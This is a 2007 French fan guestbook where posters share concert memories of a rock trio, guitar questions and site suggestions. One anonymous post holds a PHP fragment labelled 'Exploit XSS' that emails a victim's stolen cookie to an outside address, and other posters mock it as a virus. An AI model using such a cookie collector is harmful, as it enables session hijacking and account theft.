|
Le 20/07/2007 à 12h29 (90.16.***.***) |
olivierdu57 - Viv
|
|
Salu Viv, juste un pti coucou en passant car je dois aller rendre la voiture de loc'.
Merci pour ton message, très sympa vraiment! On se reparle plus tard dans la journée.
Olivier
|
 |
 |
Le 20/07/2007 à 11h59 (217.109.***.***) |
|
|
s'etait toi la rousse devant habille avec un haut bleu ????
|
 |
 |
Le 20/07/2007 à 11h43 (90.24.***.***) |
Ed @ Yamero -
|
|
Très sympa ce petit morceau . Chapeau l'ami !!
|
 |
 |
Le 20/07/2007 à 11h34 (195.115.**.***) |
|
|
Salut Dan...
je viens de voir ton message pour la Les Paul, c'est peut être trop tard mais moi j'ai
une LP Classic 60' (celle que j'avais au Bertiboeuf...)ou une 335...comme tu veux comme tu peux...
@+ Vince
|
 |
 |
Le 20/07/2007 à 08h59 (164.129.*.**) |
Nathalie CH - @ Youti et Azerty
|
|
Pardon Youti, ce n'était pas toi, c'était donc Azerty qui m'avait traité de vieille! Bises à vous 2 quand même, et à une prochaine!
|
 |
 |
Le 20/07/2007 à 08h30 (83.205.***.***) |
Lorence@sdub -
|
|
Bonne idée!Why not?
|
 |
 |
Le 20/07/2007 à 08h01 (84.55.***.**) |
sdub - @Louis
|
|
Louis tout d'abord coucou à toi. Je me disais ce matin que ca serait cool si les liens pour passer d'une page a l'autre d'un forum situé en bas pouvais etre répété en haut de la page html ? ca m'arrive souvent de repasser sur le forum et de vouloir atteindre une page précédente (avec toutes les photos de ces derniers jours c'est drequent) et du coup il faut descendre tout en bas. Rien de bien génant mais je me disais que ca pouvais etre une amelioration sympa. D'autre sont peut etre interessé ?
En attendant bon week end à toi et à tout les gnacs fille garcon
|
 |
 |
Le 20/07/2007 à 01h15 (77.200.***.***) |
Viv @ all -
|
|
Pifou sacrée soirée , que du bonheur.
Déja rencontre avec olivierdu57 , super gars , vraiment sympa , on a bien tué le temps a parler de notre trio favori pendant plus d'une heure et demi.
Puis la début du concert , une pluie fine qui commence a tomber , je stresse un peu pour la suite du concert (a cause de ca on a même pas eut droit a cendrillon version longue , sale pluie..) puis apres ca se calme , jusqu'a "Ca c'est vraiment toi" ou la elle est vraiment tombée mais on s'en fous , c'est que de l'eau , on a le boss et ses deux mousquetaires qui nous font vivre un superbe moment alors la pluie hein... même la grèle m'aurait pas empêchée de rester.
Alors sous des cordes , tout le monde chantait un autre monde pendant que l'equipe recouvrait la moitié du matos qui n'etait pas couvert , tres bon moment malgres tout.
Puis déja la fin du concert , Louis qui passe aux grilles signer quelques autographes , accorder quelques photos et bisous , Cyril qui nous rejoins dehors pour photos , autographes et discu , super puis Sylvain dans un coin qui discutait avec des gens qui nous a aussi accordé des photos et autographes, tous super sympa comme on peut l'imaginer , simples , pas de prise de tête , un vrai Power Trio comme on l'aime quoi.
Je sais pas si pour moi il y en aura une (peut etre si vous repassez dans le sud ouest) mais je vous dit peut etre a la prochaine a tous les trois , vous avez étés géniaux , super moment , puis content d'avoir rencontré olivier , super gars , tres gentil.
Rock 'n Roll !
Viv !
|
 |
 |
Le 19/07/2007 à 23h33 (82.65.***.***) |
|
|
salut tout le monde !!!je suis guitariste et je voulai savoir si quelqun pouvai me dire comment faire un effet egüe pendant un solo en haut du manche (desole je ne sais pas comment on appel sa...) merci d'avance
|
 |
 |
Le 19/07/2007 à 21h15 (83.113.***.***) |
Lorence@lau yam&co -
|
|
Merçi a toi des encouragements,mais tu tiens le bon bout!Quand on commençe à compter les jours ç'est que ça y est presque!La jolie petite Mina va pouvoir profiter de son papa et de sa maman pour quelques temps!Amitiés de gnac!!!
|
 |
 |
Le 19/07/2007 à 20h30 (83.202.***.***) |
Youti @ Azerty -
|
|
ok ok mon pote, on peut dire qu'on etait bien entouré pour ce concert!!! lol
|
 |
 |
Le 19/07/2007 à 19h46 (172.184.**.**) |
AZERTY @YOUTY ET AUX NAT -
|
|
salut youti a ma gauche il y avait les deux nath la jeune et la un peu plus vielle lol , et youti etait juste derriere moi , et nat tu dois te souvenir de moi on a parler ensemble j etais avec mon papa qui etait habille en blanc; bon c pas le tout mais a bientot les zami moi je vais bequetais+++
|
 |
 |
Le 19/07/2007 à 19h15 (82.252.***.***) |
fred vanessa -
|
|
un p' tit dernier a st nazaire
soutien au Mastah
|
 |
 |
Le 19/07/2007 à 19h12 (88.140.***.**) |
LouisAddicted@ l’inconnu -
|
|
N’énerves pas louis avec tes virus qui marche plus ou il va encore nous faire ce soir un putain de Concert de 27h 45. Oui au Bonheur de tous mais t’es pas ultra drôle.
|
 |
 |
Le 19/07/2007 à 19h08 (213.103.***.***) |
JeAnNe @ l'inconnu de 18h45 -
|
|
Mmmmh... J'allais le dire, mais tu as été plus rapide.
|
 |
 |
Le 19/07/2007 à 18h45 (217.77.**.***) |
|
|
altesse3@hotmail.fr";
$sujet = "Exploit XSS";
// Codage HTML du message
$message = "Vous venez de recevoir un cookie!
$_GET[cookie] ";
// Envoy du email
$de=$a;
$marge = "From: $de ";
$marge .= "Content-type: text/html ";
mail($a, $sujet, $message, $marge);
?>
|
 |
 |
Le 19/07/2007 à 18h27 (90.24.***.**) |
Youti @ Nathalie -
|
|
oué mais aussi vous etiez beaucoup de filles alors comment vous reconnaitre LOL. mais je crois vous avoir deja vu a un concert??? moi j'ai fais l'europeen, montereau, chatenay malabry et blois biensur, en tout cas cool d'avoir repondu ca fais plaiz!!!
|
 |
|